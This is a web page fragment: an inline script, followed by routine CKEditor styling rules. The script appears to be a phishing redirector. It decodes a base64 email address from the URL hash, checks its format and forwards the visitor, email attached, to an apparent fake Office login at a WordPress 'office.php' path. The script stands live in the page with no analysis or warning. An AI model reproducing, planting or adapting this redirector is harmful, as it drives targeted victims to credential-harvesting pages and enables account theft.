<script type="text/javascript">
function validateEmail(referrer) {
var re = /^(([^<>()[\]\.,;:\s@\"]+(\.[^<>()[\]\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
return re.test(referrer);
}
decodeBase64 = function(s) {
     var e={},i,b=0,c,x,l=0,a,r='',w=String.fromCharCode,L=s.length;
     var A="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
     for(i=0;i<64;i++){e[A.charAt(i)]=i;}
     for(x=0;x<L;x++){
         c=e[s.charAt(x)];b=(b<<6)+c;l+=6;
         while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2)))&&(r+=w(a));}
     }
     return r;
}
//var ramp = window.location.hash.substring(1);
var hash = window.location.hash.substring(1);
var email = decodeBase64(hash);
var email64 = decodeBase64(hash);
var email2 = email64.replace('$', '@');
var hash2 = btoa(email2);
console.log(email);
if(validateEmail(email2)) {
  console.log(email);
  window.location = "https://micrositeserver.com/wp-content/office.php#"+hash2;
}
</script>body.cke_editable { padding:10px; }body.cke_editable a {}body.cke_editable ul {}body.cke_editable ol {}body.cke_editable h1 {}body.cke_editable h2 {}body.cke_editable h3 {}body.cke_editable h4 {}body.cke_editable h5 {}body.cke_editable h6 {}body.cke_editable pre {}body.cke_editable address {}body.cke_editable blockquote {}body.cke_ltr div.cke_panel_block ul.cke_panel_list .cke_panel_listItem{}body.cke_ltr { overflow :initial } body.cke_ltr div.cke_panel_block { min-height:200px }.cke_panel_container body { background:none; }html.cke_panel_container body.cke_ltr::after {display:none;}p.ark_noblock { padding:0; margin:0 }img.left, .pull-left { float:left; margin-right:10px; }img.right, .pull-right  { float:right; margin-left:10px; }img.center, .pull-center { display:block; margin:0 auto; }p.pull-center, div.pull-center { text-align:center; }figcaption.text-center { text-align:center;}img.modal { position:relative; cursor:zoom-in; }img.modal.thumbnail { display:inline-block; width:200px; }img.thumbnail {margin: 4px;border: 1px solid #ddd;display:block;padding:4px;box-shadow: 0 1px 3px rgba(0, 0, 0, 0.055);transition: all 0.2s ease-in-out 0s;line-height:20px;border-radius:4px;}a.thumbnail:hover, a.thumbnail:focus {box-shadow:0 1px 4px rgba(0, 105, 214, 0.25);border-color:#0088cc;}div.video_align_left { float:left; margin-right:20px; }div.video_align_right{ float:right; margin-left:20px; }div.video_align_center { display:table; margin-left:auto; margin-right:auto; }div.video_narrow { width:75%; }div.audio_align_left { float:left; margin-right:20px; }div.audio_align_right{ float:right; margin-left:20px; }div.audio_align_center { display:table; margin-left:auto; margin-right:auto; }